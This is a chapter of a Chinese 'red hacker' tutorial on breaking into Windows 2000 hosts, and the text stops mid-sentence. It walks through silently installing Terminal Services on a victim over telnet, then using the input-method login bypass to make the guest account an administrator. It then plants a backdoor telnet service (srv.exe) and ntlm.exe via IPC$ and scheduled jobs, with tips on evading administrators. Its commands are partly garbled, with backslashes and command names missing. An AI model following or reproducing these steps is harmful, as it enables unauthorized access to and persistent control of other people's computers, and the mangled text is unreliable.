《30天打造专业红客》第5章

tel登陆对方主机；准备安装服务组件。　在这里；我强烈建议使用2000自带的tel服务端登陆；　
有回显；不容易出错。个人感觉使用它；一次成功的比例高很多。（呵呵~；个人理解啊！）　
就算没有开；打开用完后再关掉就完了。　
。abu。写的最快速登录WIN2K　TEL　服务已经把这个方法介绍的非常详细；　
而且他的办法（在本机建立同名；同密码帐户）；让快速实现tel登陆成为现实。　假如我们已开启对方23端口；　
tel　192。168。0。1　
输入用户名/密码　
*===============================================================　
欢迎使用　Microsoft　Tel　服务器。　
*===============================================================　
C：》　
成功进入！！！！　进入后；再次检查终端组件是否安装：　
c：》query　user　
这个工具需要安装终端服务。　这样就进一步确定了组件没有被安装。如果返回：　
USERNAME　SESSIONNAME　ID　STATE　IDLE　TIME　LOGON　TIME　
》w1　console　0　运行中　。　2002…1…12　22：5　
类似这样的信息；可能组件就已安装。　好！都清楚了；可以开始安装了。　
………………………………………………………………………………………………………………………………………　
C：》dir　c：sysoc。inf　/s　//检查INF文件的位置　
c：WINNTinf　的目录　2000…01…10　20：00　3；770　sysoc。inf　
1　个文件　3；770　字节　
……………………………………………………………………………………………………………………………………………　
C：》　dir　c：sysocmgr。*　/s　//检查组件安装程序　
c：WINNTsystem32　的目录　2000…01…10　20：00　42；768　sysocmgr。exe　
1　个文件　42；768　字节　
……………………………………………………………………………………………………………………………………………　
c：》echo　＇ponents＇　》　c：wawa　
c：》echo　TSEnable　=　on　》》　c：wawa　
//这是建立无人参与的安装参数　
c：》type　c：wawa　
＇ponents＇　
TSEnable　=　on　
//检查参数文件　
………………………………………………………………………………………………………………………………………………　
c：》sysocmgr　/i：c：winntinfsysoc。inf　/u：c：wawa　/q　
……………………………………………………………………………………………………………………………………………　
这一条就是真正安装组件的命令。　
以上这条命令没有加/R参数；主机在安装完后自动重起。　
如若加了/R参数主机就不会重起。　如果一切正常的话；几分钟后对方主机将会离线；当它重新回来时；　
3389终端服务就已经开启。你就可以连上去了。　问题和建议：　A　在安装过程中；不使用/R；有时主机也不会重起；你就要手动重起他；但在使用诸如：iisreset　/reboot命令时；对方　
的屏幕会出现个对话框；写着谁引起的这次启动；离重起还有多少秒。　B　一次不行可以再试一次；在实际中很有作用。　C　在输入sysocmgr命令开始安装时；一定不要把命令参数输错；那会在对方出现一个大的对话框；是sysocmgr的帮助；很是显眼；　
而且要求确定。在你的屏幕上是不会有任何反应的；你不会知道出错，所以会有B的建议。　
好了以后你就想干什么就干什么了。不过有时候还真不知道干什么，总之得干个事，装个什么局域网控制软件，不过不要体积太大，容易被发现。
超强　C　语言代码；你有信心看懂吗？
刚刚说有输入法漏洞的机子很少了，但有些朋友担心还有怎么办，不是吃大亏了吗？这样我找了一篇写的不错的文章贴一下（　注意是转载）写的不错，据说是新写的，这位大哥也真闲啊
WIN2000中文简体版存在的输入法漏洞，可以使本地用户绕过身分验证机制进入系统内部。经实验，WIN2000中文简体版的终端服务，在远程操作时仍然存在这一漏洞，而且危害更大。　
WIN2000的终端服务功能，能使系统管理员对WIN2000进行远程操作，采用的是图形界面，能使用户在远程控制计算机时功能与在本地使用一样，其默认端口为3389，用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。　
工具：客户端连接管理器，下载地址：自己找吧，天天有好几种呢。　
入侵步骤：　
一，获得管理员账号。　
我们先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL＋SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白栏中填入〃c：winntsystem32〃。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。　
现在我们要获得一个账号，成为系统的合法用户。在该目录下找到〃。exe〃，为〃。exe〃创建一个快捷方式，右键点击该快捷方式，在“属性”－》“目标”－》c：winntsystem32。exe后面空一格，填入〃user　guest　/active　：yes〃点“确定”。这一步骤目的在于用。exe激活被禁止使用的guest账户，当然也可以利用〃user　用户名　密码／add〃，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入〃user　guest　密码〃，运行，于是guest便有了密码。最后，再次修改，填入“localgroup　administrators　guest　/add，将guest变成系统管理员。　
注意事项：１、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。　
２、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操作，你只能再连结。　
３、你所看到的图像与操作会有所延迟，这受网速的影响。　
二，创建跳板。　
再次登录终端用务器，以〃guest〃身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft　网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。　
退出对方系统，在本地机命令提示符下，输入　
use　IP　AddressIPC　＇〃password〃＇　/user：〃guset〃，通过IPC的远程登陆就成功了。　
登陆成功之后先复制一个Tel的程序上去（小榕流光安装目录下的Tools目录里的Srv。exe；另外，还有ntml。xex，一会要用），这个程序是在对方上面开一个Tel服务，端口是99。　
copy　c：hacksrv。exe　***。***。***。***admin　
然后利用定时服务启动它，先了解对方的时间：　
time　***。***。***。***　
显示：　
***。***。***。***　的当前时间是　2001/1/8　下午　08：55　
命令成功完成。　
然后启动srv。exe：　
at　***。***。***。***　09：00　srv。exe
显示：　
新加了一项作业，其作业　ID　=　0　
过几分钟后，tel　***。***。***。***　99　
这里不需要验证身份，直接登录，显示：　
c：winnt：system32》　
我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：　
copy　c：hackntlm。exe　211。21。193。202admin　
把事先存放在hack目录里的ntlm。exe拷过去。然后又回到刚才的tel窗口，运行ntlm。exe　
C：WINNTsystem32》ntlm　
显示：　
Windows　2000　Tel　Dump；　by　Assassin；　All　Rights　Reserved。　
Done！　
C：WINNTsystem32》　
C：WINNTsystem32》　
好，现在我们来启动WIN2000本身的tel，首先终止srv。exe的tel服务：　
stop　tel　系统告诉你并没有启动tel，不理它，继续：　
start　tel　这次真的启动了tel，我们可以在另开的命令提示符窗口tel到对方的　
23端口，验